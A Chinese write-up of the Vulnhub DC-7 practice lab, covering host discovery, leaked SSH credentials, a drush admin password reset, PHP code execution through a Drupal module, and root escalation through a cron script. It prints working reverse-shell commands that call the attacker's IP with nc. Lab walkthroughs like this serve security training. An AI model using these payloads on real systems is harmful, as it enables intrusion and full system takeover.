zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:DC-7

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/dc-7,356/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

    二、靶场攻略

    1、惯例,使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探测存活主机,找到靶场ip

     2、探测启动的服务端口:nmap -A -p- 10.10.114.87

     

     3、访问端口,看到首页提示,暴力破解不能用,尝试登录失败五次会锁定,msf中直接打的exp也没打进去

    4、按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,就搜索了一下这个人

     发现了github账户,账户下有网站源码文件,里面有配置文件信息

     尝试登录网站发现不对

     尝试登录ssh,原来是ssh的账号密码

     5、使用命令ls,查看到有一个邮件

     查看邮件,发现几个关键脚本文件

     查看backups.sh文件,是一个定时root执行的备份文件的脚本

     drush是对密码进行操作的命令

     知道有admin账户,所以修改密码,输入命令:drush user-password  admin --password="nihao123!"

     重新去登录网站,登录成功

     6、打开管理页面去安装一个PHP扩展方便写入木马,扩展程序下载连接为:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz,下载完成之后,到管理的扩展界面,安装新插件即可

    安装完成之后,多出了一个PHP Filter

     启动扩展之后,到编辑菜单,编辑首页内容,内容代码选择php code,之后在内容中加入<?php phpinfo();?>,发现成功执行

     

     7、在文本中,写入要执行的反弹shell的命令:<?php system('nc -e /bin/bash 10.10.114.76 2345');>,kali攻击机使用nc接收之后,顺利拿到www账户的shell

    再使用命令:python -c "import pty;pty.spawn('/bin/bash')",拿到www权限的交互shell

     8、到备份脚本的页面,查看权限,知道只有root和www账户有对自动运行的backups.sh脚本有编辑权限

     使用命令:echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.114.76 3456 >/tmp/f" >> backups.sh,将反弹shell的命令,写入到backups.sh中

    等一段时间,备份脚本以root账户自动执行之后,顺利拿到root权限的shell,得到flag

     完

  • 相关阅读:
    stm32 SPI DMA读取ADS8345数据
    Minigui3.0.12完美安装,折腾了一天。终于看到了
    qvfb2的安装,在ubuntu10.4上安装成功
    户口从杭州人才市场迁移到武汉万科魅力之城的过程
    禁止minigui 3.0的屏幕保护
    想穿越回到儿时记录那些幸福
    TIM2定时闪灯程序。。。
    关于minigui的皮肤控件无法显示问题
    插件框架内核的设计
    用“序列图”描述技术方案
  • 原文地址:https://www.cnblogs.com/sym945/p/13926313.html
Copyright © 2011-2022 走看看